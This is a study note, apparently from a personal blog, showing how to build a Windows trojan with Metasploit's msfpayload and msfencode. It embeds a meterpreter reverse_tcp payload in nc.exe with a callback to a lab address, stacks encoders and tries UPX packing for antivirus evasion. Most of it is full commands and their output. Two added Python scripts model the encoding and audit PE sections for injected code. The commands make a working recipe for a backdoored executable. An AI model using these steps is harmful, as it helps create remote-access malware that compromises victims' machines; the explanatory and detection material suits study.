Building a trojan with msfpayload and encoding it with msfencode

# msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter    # first list the available payload modules, then filter with grep to find the module you need and its path

windows/meterpreter/reverse_tcp    Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_dns   Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4   Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4_dns  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/patchupmeterpreter/reverse_tcp  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_dns  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/x64/meterpreter/reverse_tcp    Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)

The "msfpayload -l" command lists every payload; the grep chain narrows the list to what is needed here: the target runs Windows (grep windows), the payload must connect back to the listening host (grep reverse_tcp), and it should give post-exploitation capability (grep meterpreter). Everything matched is a staged payload: the small stager connects back and the meterpreter DLL is delivered to it over that connection, so a handler (exploit/multi/handler) configured with the same payload, LHOST and LPORT has to be listening when the trojan runs.

# msfpayload windows/meterpreter/reverse_tcp O    # the last argument is an upper-case letter O, not the digit 0; it prints the payload module's options

Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 290
Rank: Normal

Provided by:
skape <>
sf <>
hdm <>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
Connect back to the attacker, Inject the meterpreter server DLL via
the Reflective Dll Injection payload (staged)

======
Running msfpayload and msfencode failed at first. The cause turned out to be the template argument: a bare file name such as nc.exe given to -x is not looked up in the current directory but in Metasploit's own template directory (data/templates/ of the install that owns the msfencode in PATH, here /opt/metasploit/apps/pro/msf3, as the error path shows), so the template has to be passed as ./nc.exe or with an absolute path.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory - /opt/metasploit/apps/pro/msf3/data/templates/nc.exe
[-] No encoders succeeded.

# find / -name "*shikata_ga_nai*"
/usr/share/metasploit-framework/modules/encoders/x86/shikata_ga_nai.rb
————————————

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[-] x86/shikata_ga_nai failed: No such file or directory - /opt/metasploit/apps/pro/msf3/data/templates/nc.exe
[-] No encoders succeeded.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode_17.exe    # as an attempt at AV evasion the payload is encoded 17 times in total (5 x shikata_ga_nai, 2 x alpha_upper, 5 x shikata_ga_nai, 5 x countdown); the intermediate stages are piped as raw shellcode and only the last msfencode writes the exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/alpha_upper succeeded with size 919 (iteration=1)
[*] x86/alpha_upper succeeded with size 1907 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1936 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1965 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1994 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2023 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2052 (iteration=5)
[*] x86/countdown succeeded with size 2070 (iteration=1)
[*] x86/countdown succeeded with size 2088 (iteration=2)
[*] x86/countdown succeeded with size 2106 (iteration=3)
[*] x86/countdown succeeded with size 2124 (iteration=4)
[*] x86/countdown succeeded with size 2142 (iteration=5)

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t raw | msfencode -e x86/context_time -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode_23.exe    # even after this elaborate chain of 23 encoding passes the file was still detected, and the resulting program no longer runs at all

Stacking encoders is not an evasion technique. Every pass just prepends another decoder stub to the previous output (the sizes above grow by a constant per pass, 27 to 29 bytes for shikata_ga_nai and 18 for countdown, while alpha_upper roughly doubles the body), each stub is itself a well-known pattern, and the detection fires on the decoder rather than on the encoded bytes behind it. More layers therefore only make the file larger and more fragile.
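The two encoder chains above (the 17-pass and the 23-pass one) are easier to reason about with a model of what one encoding pass actually produces. The following Python is an added example, not code from this post or from Metasploit: it keeps only the arithmetic of a 4-byte XOR additive-feedback encoder (the family that x86/shikata_ga_nai belongs to) and stands in for each layer's decoder stub with a constructed constant byte string. A real stub is a few dozen bytes of x86 that vary in register choice and instruction order, but every pass still prepends one more plaintext decoder in front of the body, which is why the sizes in the transcripts grow by a fixed amount per pass and why scanners match the decoder rather than the body. The sample payload bytes are constructed, not real shellcode.

```python
"""Layered shellcode encoding modelled in Python (added example, not Metasploit code)."""
import struct

# Constructed stand-in for a decoder stub. A real stub carries its key in an
# immediate operand; here the key is simply appended after the stub bytes.
STUB = b"TOY-DECODER-STUB"      # 16 bytes, identical for every layer and every key
KEY_SIZE = 4


def encode(payload, key):
    """out = in ^ key; key = (key + in) mod 2**32, one little-endian dword at a time."""
    data = payload + b"\x90" * (-len(payload) % 4)   # pad to whole dwords with NOPs
    out = bytearray()
    for off in range(0, len(data), 4):
        word = struct.unpack_from("<I", data, off)[0]
        out += struct.pack("<I", word ^ key)
        key = (key + word) & 0xFFFFFFFF
    return bytes(out)


def decode(blob, key):
    """Inverse of encode(): the decoded dword feeds the next key, exactly as in the encoder."""
    out = bytearray()
    for off in range(0, len(blob), 4):
        word = struct.unpack_from("<I", blob, off)[0] ^ key
        out += struct.pack("<I", word)
        key = (key + word) & 0xFFFFFFFF
    return bytes(out)


def wrap(payload, key):
    """One encoder pass: decoder stub + key + encoded body."""
    return STUB + struct.pack("<I", key) + encode(payload, key)


def unwrap(blob):
    """Run one decoder layer: recover the key from the stub and decode the body behind it."""
    if not blob.startswith(STUB):
        raise ValueError("outermost layer is not a decoder stub")
    key = struct.unpack_from("<I", blob, len(STUB))[0]
    return decode(blob[len(STUB) + KEY_SIZE:], key)


def encode_layers(payload, keys):
    """Apply one pass per key, like 'msfencode -c N'; return the blob and the size after each pass."""
    sizes = []
    for key in keys:
        payload = wrap(payload, key)
        sizes.append(len(payload))
    return payload, sizes


def decode_layers(blob, passes):
    """Peel off 'passes' layers outermost first, the order the stubs execute at run time."""
    for _ in range(passes):
        blob = unwrap(blob)
    return blob


def visible_prefix(blob):
    """What a byte scanner sees without executing anything: the outermost stub in clear."""
    return blob[:len(STUB)]


# Constructed 15-byte sample standing in for a stager; not real shellcode.
PAYLOAD = bytes(range(0x41, 0x50))

if __name__ == "__main__":
    keys = [0x11223344, 0xDEADBEEF, 0x0BADF00D]
    blob, sizes = encode_layers(PAYLOAD, keys)
    print("size after each pass:", sizes)          # grows by len(STUB) + KEY_SIZE per pass
    print("round trip ok:", decode_layers(blob, len(keys))[:len(PAYLOAD)] == PAYLOAD)
    print("outermost stub identical for any key:",
          visible_prefix(wrap(PAYLOAD, 1)) == visible_prefix(wrap(PAYLOAD, 2)))
```

Three passes turn 15 bytes into 36, 56 and 76 bytes, the same "constant per pass" growth the transcripts show for shikata_ga_nai and countdown, and the outermost stub is byte-identical no matter which key was used or how many layers sit underneath it. Whatever the key, the body is different, but a scanner never needs the body.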

I then ran the generated trojan through UPX, hoping that a further packing step would help with evasion, but UPX refused the file every time with "section size problem". The error comes from UPX's sanity checks on the section table before it packs anything; the usual trigger is a section whose SizeOfRawData is larger than its VirtualSize, and the section that msfencode appends to the template to hold the payload when -x/-k is used is the obvious suspect. Packing with UPX would in any case add nothing for evasion: its unpacking stub is recognised by every scanner and "upx -d" restores the original file.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

# upx -6 -o nc_encode_upx6.exe nc_encode.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
--------------------   ------   -----------   ----------
upx: nc_encode.exe: CantPackException: section size problem

Packed 1 file: 0 ok, 1 error.
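To find out which section UPX is objecting to, dump the section headers of the output file. The following Python is an added example, not code from this post, from Metasploit or from UPX: it parses the section table of a 32-bit PE (PE32, which is what an x86 template such as nc.exe is), applies the same kind of consistency check UPX does (SizeOfRawData larger than VirtualSize) and also flags the two things a payload section injected with -x/-k is expected to show: writable plus executable permissions, because in-place decoders such as shikata_ga_nai rewrite their own bytes, and the entry point pointing into it, because -k redirects the entry to code that starts the payload in a new thread before the template continues. The image it audits when run without arguments is constructed in the code; the three ordinary sections imitate a small console tool and the fourth is a guess at an injected section, not a dump of nc_encode.exe. Run it as "python audit_pe.py nc_encode.exe" to see the real table.

```python
"""Audit a PE32 section table for what UPX rejects and what an injected payload section looks like.
Added example; the sample image and its 'injected' section are constructed, not taken from nc_encode.exe."""
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe32(data):
    """Return (AddressOfEntryPoint, [section dicts]) from the raw bytes of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = \
            struct.unpack_from(SECTION_HEADER, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "rawptr": rawptr, "flags": flags})
    return entry, sections


def audit(entry, sections):
    """Return (section name, finding) pairs for every suspicious header."""
    findings = []
    for s in sections:
        vsize = s["vsize"] or s["rawsize"]          # a zero VirtualSize means "same as raw"
        if s["rawsize"] > vsize:
            findings.append((s["name"], "SizeOfRawData %#x exceeds VirtualSize %#x "
                             "(the inconsistency UPX reports as 'section size problem')"
                             % (s["rawsize"], vsize)))
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "section is writable and executable"))
        if s["vaddr"] <= entry < s["vaddr"] + max(vsize, s["rawsize"]):
            findings.append((s["name"], "contains AddressOfEntryPoint %#x" % entry))
    return findings


def build_pe32(sections, entry):
    """Construct a headers-only PE32 image (DOS stub, COFF and optional header, section table)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                   # e_lfanew
    hdr += b"PE\0\0"
    # i386, N sections, no symbols, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    hdr += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 32, 0x1000)                    # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                     # FileAlignment
    hdr += opt
    for name, vsize, vaddr, rawsize, rawptr, flags in sections:
        hdr += struct.pack(SECTION_HEADER, name.ljust(8, b"\0"),
                           vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)
    return bytes(hdr)


# Constructed sample: name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, flags.
SAMPLE_SECTIONS = [
    (b".text", 0x8000, 0x1000, 0x8000, 0x0400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x2000, 0x9000, 0x1000, 0x8400, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", 0x1000, 0xB000, 0x1000, 0x9400, IMAGE_SCN_MEM_READ),
    # Guess at an injected payload section (assumption, not a dump): RWX because the decoder
    # patches itself, and a raw size larger than the virtual size.
    (b".text", 0x0400, 0xC000, 0x0600, 0xA400,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]
SAMPLE_ENTRY = 0xC000       # entry point redirected into the injected section

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_pe32(SAMPLE_SECTIONS, SAMPLE_ENTRY)
    entry, secs = parse_pe32(data)
    for s in secs:
        print("%-8s vaddr=%#07x vsize=%#07x raw=%#07x flags=%#010x"
              % (s["name"], s["vaddr"], s["vsize"], s["rawsize"], s["flags"]))
    for name, msg in audit(entry, secs):
        print("!! %s: %s" % (name, msg))
```

On the constructed image only the fourth section is reported, with all three findings; on a clean template the only finding should be the entry point inside the original .text. A second section called .text after .rsrc, or any finding on a section that was not in the original nc.exe, is the injected code.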

==============================================

# msfencode -h

    Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

    OPTIONS:
-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: '\x00\xff'
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)    (only meaningful together with -x: the payload is started in a new thread so the template program keeps working)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,psh,psh-net,vba,vba-exe,vbs,war
-v        Increase verbosity
-x <opt>  Specify an alternate executable template    (use the given executable as the template; a bare file name is resolved against Metasploit's data/templates directory, so give a path)

This is really just an old study note of mine.

